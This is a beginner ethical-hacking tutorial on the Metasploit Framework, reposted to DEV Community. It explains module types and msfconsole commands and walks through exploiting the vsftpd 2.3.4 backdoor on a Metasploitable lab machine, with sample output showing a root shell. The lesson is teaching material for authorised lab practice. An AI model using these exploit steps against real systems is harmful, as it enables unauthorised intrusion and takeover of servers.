DEV Community

Cover image for Day 21: Metasploit Framework — From Module to Shell (Complete Beginner's Guide 2026)
Mr Elite
Mr Elite

Posted on • Originally published at securityelites.com

Day 21: Metasploit Framework — From Module to Shell (Complete Beginner's Guide 2026)

#howtouseetasploit #meterpretertutorial #msfconsolecommands #thicalacking

📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.

Day 21: Metasploit Framework — From Module to Shell (Complete Beginner's Guide 2026)

DAY 21 OF 100
PHASE 3: CORE ATTACKS

Full Course →

🟣 Day 21 — Metasploit Framework

Day 100 — Professional Pentester

← Day 20: Web App Methodology

Day 22: Exploitation Techniques →

🟣 PHASE 3 BEGINS — CORE ATTACK TECHNIQUES (DAYS 21–35)

Phase 2 gave you the web application layer. Phase 3 adds the infrastructure exploitation layer — Metasploit, network exploitation, post-exploitation, privilege escalation, pivoting, and Active Directory attacks. The tools and techniques professionals use when web vulnerabilities lead to deeper access.

⚖️
Authorised use only: All Metasploit demonstrations use Metasploitable 2 in your isolated lab. Using Metasploit against systems you don’t own or have explicit written permission to test is illegal under computer crime laws globally. The tool’s power is precisely why authorisation documentation is non-negotiable — every professional engagement starts with written scope before any Metasploit module runs.

21

Everything you’ve learned in the first 20 days was building to this moment. You understand networks. You understand web vulnerabilities. You understand the methodology. Now you get the tool that professional penetration testers use on virtually every infrastructure engagement — a framework containing over 2,400 exploits, integrated payloads, and a post-exploitation platform that turns a single vulnerable service into comprehensive server access.

Metasploit is not a magic button. Students who learn it before understanding the underlying concepts treat it as a black box. You’re different — you’ve spent 20 days building the foundation. Today Metasploit makes sense not just as a set of commands, but as a system whose design reflects exactly the attack concepts you’ve already internalised.

The Metasploit Framework was created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. The Community and open-source versions remain free and are pre-installed on Kali Linux. Metasploit Pro (commercial) adds automation and reporting. For this course — and for most professional testing purposes — the open-source version is entirely sufficient.

📋 Day 21 Contents

  1. Metasploit Architecture — How It’s Built
  2. msfconsole — Navigation & Core Commands
  3. The Search → Use → Options → Run Workflow
  4. Auxiliary Modules — Scanning & Brute Force
  5. First Exploit — vsftpd Backdoor on Metasploitable
  6. Payloads — Shells, Staged & Stageless
  7. Meterpreter — Post-Exploitation Powerhouse
  8. Session Management
  9. msfdb — Saving Your Work
  10. Day 21 Practical Task

Metasploit Architecture — Understanding What You’re Working With

Before touching the console, understand the structure. Metasploit is a modular framework — every capability is a module of a specific type. Knowing the module types tells you exactly where to look when you need a particular capability.

EXPLOIT
Takes advantage of a vulnerability. Requires a payload. Examples: MS17-010 (EternalBlue), vsftpd 2.3.4 backdoor.

AUXILIARY
Supporting tasks — scanners, fuzzers, brute forcers, sniffers. No payload required. Examples: port scanners, service version detectors.

PAYLOAD
What executes on the target after exploitation. Reverse shell, bind shell, Meterpreter, command execution, file operations.

POST
Post-exploitation modules — privilege escalation, credential dumping, lateral movement. Run after a Meterpreter session is established.

ENCODER
Transforms payloads to evade detection. Obfuscates the payload bytes. Shikata Ga Nai (x86) is the classic example.

NOP / EVASION
NOP sleds for buffer overflow exploits. Evasion modules generate AV-evasive executable payloads. Advanced use cases.

msfconsole — Navigation & Core Commands

msfconsole is the primary interface for the Metasploit Framework. It’s a command-line console with its own set of commands and tab-completion. Launch it from any Kali terminal and you’ll see the banner and the msf6 > prompt. Everything in Metasploit flows through this interface.

msfconsole — launching and essential navigation commands

Launch Metasploit

msfconsole

Or with database support enabled

msfdb init && msfconsole

── Core navigation commands ────────────────────────────────

help # Show all available commands
search vsftpd # Search modules by keyword
use 0 # Select module by index number from search results
use exploit/unix/ftp/vsftpd_234_backdoor # Select by full path
info # Show full module info (description, refs, options)
options # Show required and optional module options
show payloads # List compatible payloads for current exploit
set RHOSTS 192.168.56.101 # Set target IP
set LHOST 192.168.56.100 # Set your Kali IP (for reverse shells)
set LPORT 4444 # Set listener port
run # Execute the module (also: exploit)
back # Deselect current module, return to msf6 >
sessions # List all active sessions
sessions -i 1 # Interact with session 1
exit # Exit msfconsole

── Global options (set once, apply to all modules) ─────────

setg RHOSTS 192.168.56.101 # Global set (persists across modules)
setg LHOST 192.168.56.100
unsetg RHOSTS # Remove global setting
save # Save global settings to disk

💡 Tab completion is your best friend: msfconsole has full tab completion for module paths, option names, and commands. Type use exploit/ and press Tab twice to browse exploit categories. Type set R and press Tab to see all options starting with R. Never type full module paths from memory — tab-complete them.

The Core Workflow — Search → Use → Options → Set → Run

Every Metasploit engagement follows the same five-step pattern regardless of the target or vulnerability. Master this workflow and you’ll be comfortable with any module in the framework.

The five-step Metasploit workflow — annotated

── STEP 1: SEARCH ──────────────────────────────────────────

msf6 > search type:exploit name:vsftpd

Matching Modules

# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No vsFTPd v2.3.4 Backdoor Command Execution

Search operators

search type:exploit platform:linux rank:excellent
search cve:2017-0144 # EternalBlue by CVE
search name:samba # All Samba modules

── STEP 2: USE ─────────────────────────────────────────────

msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Prompt changes — you’re now inside the module context

── STEP 3: OPTIONS ─────────────────────────────────────────

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes Target IP
RPORT 21 yes Target port (default 21)

Required fields with no value must be set before running

── STEP 4: SET ─────────────────────────────────────────────

set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101

── STEP 5: RUN ─────────────────────────────────────────────

run
[] 192.168.56.101:21 – Banner: 220 (vsFTPd 2.3.4)
[] 192.168.56.101:21 – USER: 331 Please specify the password.
[+] 192.168.56.101:21 – Backdoor service has been spawned, handling…
[+] 192.168.56.101:21 – UID: uid=0(root) gid=0(root)
[] Found shell.
[] Command shell session 1 opened

📖 Read the complete guide on SecurityElites

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →

This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.

Top comments (0)